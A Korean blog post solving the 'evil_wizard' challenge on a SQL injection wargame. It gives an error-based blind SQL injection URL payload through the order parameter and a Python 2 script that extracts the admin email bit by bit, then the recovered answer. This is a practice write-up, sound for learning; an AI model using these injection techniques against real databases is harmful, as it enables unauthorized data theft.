반응형

이번 문제는 공짜로 얻었다 ㅋㅋ


문제를 보면 아래와 같이 hell_fire 문제와 정말 같은가?라는 문구가 있지만 나에겐 정말 같았다 ㅋㅋㅋ


 // same with hell_fire? really?


조금 분석해보니 order에 필터링 되는 함수에 sleep과 benchmark가 추가된 것으로 봐서 hell_fire는 time based로 풀었어야 하는 문제였나보다.


하지만 난 처음부터 blind 방식으로 풀었기 때문에 동일한 방법으로 풀었다.


1. 길이 : 30자

https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=(select+exp(710)+where+30=(select+length(email)+where+id=%27admin%27))


2. python 코드

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import urllib2
 
silnex=''
 
url="https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
 
for chr_l in range(1,31):
    binary=''
    for bin_l in range(1,8):
        param="?order=(select+exp(710)+where+1=(select+mid(lpad(bin(ord(mid(email,"+str(chr_l)+",1))),7,0),"+str(bin_l)+",1)+where+id='admin'))"
 
        req=urllib2.Request(url+param)
        req.add_header('cookie','PHPSESSID=6lng5klqduk4ua8hduhshbhsgf')
        if 'rubiya805' in urllib2.urlopen(req).read():
            binary+='0'
        else:
            binary+='1'
        
        print binary
 
    silnex = silnex+('%x' % int(binary, 2)).decode('hex')
    print "[+] " + silnex
 
print "[+]Flag : " + silnex
cs


3. 답

https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?email=aasup3r_secure_email@emai1.com

반응형

'Solve Problem > LOS' 카테고리의 다른 글

[LOS] RED_DRAGON 문제 풀이  (0) 2019.07.16
[LOS] GREEN_DRAGON 문제 풀이  (0) 2019.06.09
[LOS] hell_fire 문제 풀이  (0) 2019.06.09
[LOS] dark_eyes 문제풀이  (0) 2019.06.02
[LOS] iron_golem 문제풀이  (0) 2019.05.26
블로그 이미지

rootable

,